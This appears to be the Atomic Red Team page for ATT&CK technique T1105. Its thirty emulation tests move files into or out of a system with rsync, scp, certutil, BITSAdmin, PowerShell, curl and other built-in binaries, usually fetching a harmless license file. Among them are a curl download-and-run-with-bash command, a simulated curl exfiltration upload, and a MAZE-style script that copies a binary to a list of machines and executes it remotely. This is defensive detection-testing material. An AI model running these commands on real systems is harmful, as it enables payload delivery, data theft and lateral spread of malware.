Skip to content
Atomic Red Team
atomics
T1105

T1105 - Ingress Tool Transfer

Description from ATT&CK (opens in a new tab)

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp (opens in a new tab). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer (opens in a new tab)).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil (opens in a new tab), and PowerShell (opens in a new tab) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas) A number of these tools, such as wget, curl, and scp, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via certutil -hashfile).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (opens in a new tab) (typically after interacting with Phishing (opens in a new tab) lures).(Citation: T1105: Trellix_search-ms)

Files can also be transferred using various Web Service (opens in a new tab)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)

Atomic Tests


Atomic Test #1 - rsync remote file copy (push)

Utilize rsync to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409

Inputs:

NameDescriptionTypeDefault Value
remote_pathRemote path to receive rsyncpath/tmp/victim-files
remote_hostRemote host to copy towardstringvictim-host
local_pathPath of folder to copypath/tmp/adversary-rsync/
usernameUser account to authenticate on remote hoststringvictim

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}

Dependencies: Run with sh!

Description: rsync must be installed on the machine
Check Prereq Commands:
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
Get Prereq Commands:
(pkg install -y rsync)||(sudo apt-get -y install rsync)


Atomic Test #2 - rsync remote file copy (pull)

Utilize rsync to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f

Inputs:

NameDescriptionTypeDefault Value
remote_pathPath of folder to copypath/tmp/adversary-rsync/
remote_hostRemote host to copy fromstringadversary-host
local_pathLocal path to receive rsyncpath/tmp/victim-files
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with sh!

rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}

Dependencies: Run with sh!

Description: rsync must be installed on the machine
Check Prereq Commands:
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
Get Prereq Commands:
(pkg install -y rsync)||(sudo apt-get -y install rsync)


Atomic Test #3 - scp remote file copy (push)

Utilize scp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344

Inputs:

NameDescriptionTypeDefault Value
remote_pathRemote path to receive scppath/tmp/victim-files/
local_filePath of file to copypath/tmp/adversary-scp
remote_hostRemote host to copy towardstringvictim-host
usernameUser account to authenticate on remote hoststringvictim

Attack Commands: Run with sh!

scp #{local_file} #{username}@#{remote_host}:#{remote_path}


Atomic Test #4 - scp remote file copy (pull)

Utilize scp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33

Inputs:

NameDescriptionTypeDefault Value
remote_hostRemote host to copy fromstringadversary-host
local_pathLocal path to receive scppath/tmp/victim-files/
remote_filePath of file to copypath/tmp/adversary-scp
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with sh!

scp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #5 - sftp remote file copy (push)

Utilize sftp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e

Inputs:

NameDescriptionTypeDefault Value
remote_pathRemote path to receive sftppath/tmp/victim-files/
local_filePath of file to copypath/tmp/adversary-sftp
remote_hostRemote host to copy towardstringvictim-host
usernameUser account to authenticate on remote hoststringvictim

Attack Commands: Run with bash!

sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'


Atomic Test #6 - sftp remote file copy (pull)

Utilize sftp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef

Inputs:

NameDescriptionTypeDefault Value
remote_hostRemote host to copy fromstringadversary-host
local_pathLocal path to receive sftppath/tmp/victim-files/
remote_filePath of file to copypath/tmp/adversary-sftp
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with sh!

sftp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #7 - certutil download (urlcache)

Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

Supported Platforms: Windows

auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of file to copyurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
local_pathLocal path to place filepathAtomic-license.txt

Attack Commands: Run with command_prompt!

cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1


Atomic Test #8 - certutil download (verifyctl)

Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

Supported Platforms: Windows

auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of file to copyurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
local_pathLocal path to place filepathAtomic-license.txt

Attack Commands: Run with powershell!

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }

Cleanup Commands:

Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore


Atomic Test #9 - Windows - BITSAdmin BITS Download

This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.

Supported Platforms: Windows

auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

Inputs:

NameDescriptionTypeDefault Value
bits_job_nameName of the created BITS jobstringqcxjb7
local_pathLocal path to place filepath%temp%\Atomic-license.txt
remote_fileURL of file to copyurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)

Attack Commands: Run with command_prompt!

C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}


Atomic Test #10 - Windows - PowerShell Download

This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families.

Supported Platforms: Windows

auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of file to copyurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
destination_pathDestination path to filepath$env:TEMP\Atomic-license.txt

Attack Commands: Run with powershell!

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")

Cleanup Commands:

Remove-Item #{destination_path} -Force -ErrorAction Ignore


Atomic Test #11 - OSTAP Worming Activity

OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.

Supported Platforms: Windows

auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad

Inputs:

NameDescriptionTypeDefault Value
destination_pathPath to create remote file at. Default is local admin share.string\\localhost\C$

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd


Atomic Test #12 - svchost writing a file to a UNC path

svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to c:\, then execute svchost.exe with output to a txt file.

Supported Platforms: Windows

auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt

Cleanup Commands:

del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1


Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe

Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory.

More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of file to downloadurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
local_pathLocation to save downloaded filepath%temp%\Atomic-license.txt

Attack Commands: Run with command_prompt!

cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1

Dependencies: Run with command_prompt!

Description: Must have a Windows Defender version with MpCmdRun.exe installed
Check Prereq Commands:
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /?  >nul 2>&1
Get Prereq Commands:
Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"


Atomic Test #14 - whois file download

Download a remote file using the whois utility

Supported Platforms: Linux, macOS

auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab

Inputs:

NameDescriptionTypeDefault Value
remote_hostRemote hostname or IP addressstringlocalhost
remote_portRemote port to connect tointeger8443
output_filePath of file to save output topath/tmp/T1105.whois.out
queryQuery to send to remote serverstringHello from Atomic Red Team test T1105
timeoutTimeout period before ending process (seconds)integer1

Attack Commands: Run with sh!

timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}

Cleanup Commands:

rm -f #{output_file}

Dependencies: Run with sh!

Description: The whois and timeout commands must be present
Check Prereq Commands:
which whois && which timeout
Get Prereq Commands:
echo "Please install timeout and the whois package"


Atomic Test #15 - File Download via PowerShell

Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.

Supported Platforms: Windows

auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2

Inputs:

NameDescriptionTypeDefault Value
target_remote_fileFile to downloadurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt (opens in a new tab)
output_fileFile to write tostringLICENSE.txt

Attack Commands: Run with powershell!

(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}


Atomic Test #16 - File download with finger.exe on Windows

Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not be expecting a successful connection https://www.exploit-db.com/exploits/48815 (opens in a new tab) https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01

Inputs:

NameDescriptionTypeDefault Value
remote_hostRemote hostname or IP addressstringlocalhost

Attack Commands: Run with command_prompt!

finger base64_filedata@#{remote_host}


Atomic Test #17 - Download a file with IMEWDBLD.exe

Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE<8_RANDOM_ALNUM_CHARS>/[1].. Run "Get-ChildItem -Path C:\Users<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.

Supported Platforms: Windows

auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2

Inputs:

NameDescriptionTypeDefault Value
remote_urlLocation of file to be downloaded.urlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml (opens in a new tab)
file_nameName of the file to be downloaded without extension.stringT1105

Attack Commands: Run with powershell!

$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}

Cleanup Commands:

$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }


Atomic Test #18 - Curl Download File

The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.

Supported Platforms: Windows

auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a

Inputs:

NameDescriptionTypeDefault Value
file_downloadFile to downloadstringhttps://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll (opens in a new tab)
curl_pathpath to curl.exepathC:\Windows\System32\Curl.exe

Attack Commands: Run with command_prompt!

#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll

Cleanup Commands:

del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1

Dependencies: Run with powershell!

Description: Curl must be installed on system.
Check Prereq Commands:
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"


Atomic Test #19 - Curl Upload File

The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration Expected output will include whether the file uploaded successfully or not.

Supported Platforms: Windows

auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf

Inputs:

NameDescriptionTypeDefault Value
curl_pathpath to curl.exepathC:\Windows\System32\Curl.exe
remote_destinationRemote destinationstringwww.example.com (opens in a new tab)
file_pathFile to uploadstringc:\temp\atomictestfile.txt

Attack Commands: Run with command_prompt!

#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}

Dependencies: Run with powershell!

Description: Curl must be installed on system.
Check Prereq Commands:
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Description: A file must be created to upload
Check Prereq Commands:
if (Test-Path #{file_path}) {exit 0} else {exit 1}
Get Prereq Commands:
echo "This is an Atomic Test File" > #{file_path}


Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download

Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user. Upon successful execution the test will open calculator and Notepad executable for 10 seconds. reference: https://twitter.com/ElliotKillick/status/1455897435063074824 (opens in a new tab) https://github.com/LOLBAS-Project/LOLBAS/pull/151 (opens in a new tab) https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ (opens in a new tab) https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc

Inputs:

NameDescriptionTypeDefault Value
Path_to_filePath to the Batch scriptpathPathToAtomicsFolder\T1105\src\T1105.bat

Attack Commands: Run with command_prompt!

"#{Path_to_file}" 1>NUL

Cleanup Commands:

del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1

Dependencies: Run with powershell!

Description: #{Path_to_file} must exist on system.
Check Prereq Commands:
if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"


Atomic Test #21 - MAZE Propagation Script

This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location. Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf

Inputs:

NameDescriptionTypeDefault Value
binary_fileBinary file to copy to remote machinesstring$env:comspec
exe_remote_folderPath to store executable on remote machine (no drive letter)string\Windows\Temp\T1105.exe
remote_drive_letterRemote drive letterstringC

Attack Commands: Run with powershell!

$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet) 
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}

Cleanup Commands:

if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") 
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: Binary file must exist at specified location (#{binary_file})
Check Prereq Commands:
if (Test-Path #{binary_file}) {exit 0} else {exit 1}
Get Prereq Commands:
write-host "The binary_file input parameter must be set to a binary that exists on this computer."
Description: Machine list must exist at specified location ("PathToAtomicsFolder..\ExternalPayloads\T1105MachineList.txt")
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."


Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file

Create a ZIP file from a folder in a remote drive

Supported Platforms: Windows

auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e

Inputs:

NameDescriptionTypeDefault Value
Path_uncPath to the UNC folderpath\\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\
Path_PrintBrmPath to PrintBrm.exepathC:\Windows\System32\spool\tools\PrintBrm.exe

Attack Commands: Run with command_prompt!

del %TEMP%\PrintBrm.zip >nul 2>&1 
#{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE

Cleanup Commands:

del %TEMP%\PrintBrm.zip >nul 2>&1


Atomic Test #23 - Lolbas replace.exe use to copy file

Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df

Inputs:

NameDescriptionTypeDefault Value
replace_cabPath to the cab filepathPathToAtomicsFolder\T1105\src\redcanary.cab
Path_replacePath to replace.exepathC:\Windows\System32\replace.exe

Attack Commands: Run with command_prompt!

del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A

Cleanup Commands:

del %TEMP%\redcanary.cab >nul 2>&1

Dependencies: Run with powershell!

Description: #{replace_cab} must exist on system.
Check Prereq Commands:
if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"


Atomic Test #24 - Lolbas replace.exe use to copy UNC file

Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a

Inputs:

NameDescriptionTypeDefault Value
replace_cabUNC Path to the cab filepath\\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab
Path_replacePath to replace.exepathC:\Windows\System32\replace.exe

Attack Commands: Run with command_prompt!

del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A

Cleanup Commands:

del %TEMP%\redcanary.cab >nul 2>&1


Atomic Test #25 - certreq download

Use certreq to download a file from the web

Supported Platforms: Windows

auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b

Inputs:

NameDescriptionTypeDefault Value
local_pathLocal path to place filestring%temp%\Atomic-license.txt
remote_fileURL of file to copyurlhttps://example.com (opens in a new tab)

Attack Commands: Run with command_prompt!

certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1


Atomic Test #26 - Download a file using wscript

Use wscript to run a local VisualBasic file to download a remote file

Supported Platforms: Windows

auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188

Inputs:

NameDescriptionTypeDefault Value
vbscript_fileFull path to the VisualBasic downloading the filestringPathToAtomicsFolder\T1105\src\T1105-download-file.vbs

Attack Commands: Run with command_prompt!

wscript.exe "#{vbscript_file}"

Cleanup Commands:

del Atomic-License.txt >nul 2>&1

Dependencies: Run with powershell!

Description: #{vbscript_file} must be exist on system.
Check Prereq Commands:
if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"


Atomic Test #27 - Linux Download File and Run

Utilize linux Curl to download a remote file, chmod +x it and run it.

Supported Platforms: Linux

auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3

Inputs:

NameDescriptionTypeDefault Value
remote_urlurl of remote payloadstringhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh (opens in a new tab)
payload_namepayload namestringatomic.sh

Attack Commands: Run with sh!

curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}

Cleanup Commands:

rm #{payload_name}


Atomic Test #28 - Nimgrab - Transfer Files

Use nimgrab.exe to download a file from the web.

Supported Platforms: Windows

auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of file to copyurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
destination_pathDestination path to filepath$env:TEMP\Atomic-license.txt

Attack Commands: Run with command_prompt!

cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}

Cleanup Commands:

del #{destination_path} >nul 2>&1

Dependencies: Run with powershell!

Description: NimGrab must be installed on system.
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"


Atomic Test #29 - iwr or Invoke Web-Request download

Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.

Supported Platforms: Windows

auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of file to copyurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
local_pathLocal path to place filepath%temp%\Atomic-license.txt

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}

Cleanup Commands:

del %temp%\Atomic-license.txt >nul 2>&1


Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary

GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github. Reference (opens in a new tab) Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder

Supported Platforms: Windows

auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51

Inputs:

NameDescriptionTypeDefault Value
target_file_urlURL of the target ZIP file (Eg: https://example.com/test.zip (opens in a new tab))urlhttps://getsamplefiles.com/download/zip/sample-2.zip (opens in a new tab)
working_dirThe directory where GUP.exe & it's dependecies existspathPathToAtomicsFolder\T1105\bin\
gup_executableGUP is an open source signed binary used by Notepad++ for software updatesStringPathToAtomicsFolder\T1105\bin\GUP.exe
target_file_sha256SHA256 value of target ZIP filestringCAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"

Cleanup Commands:

rmdir /s /q "C:\Temp\Sample" >nul 2>nul

Dependencies: Run with powershell!

Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
Check Prereq Commands:
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
